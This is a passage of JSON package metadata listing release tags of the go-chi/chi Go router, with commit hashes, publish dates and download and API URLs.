.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-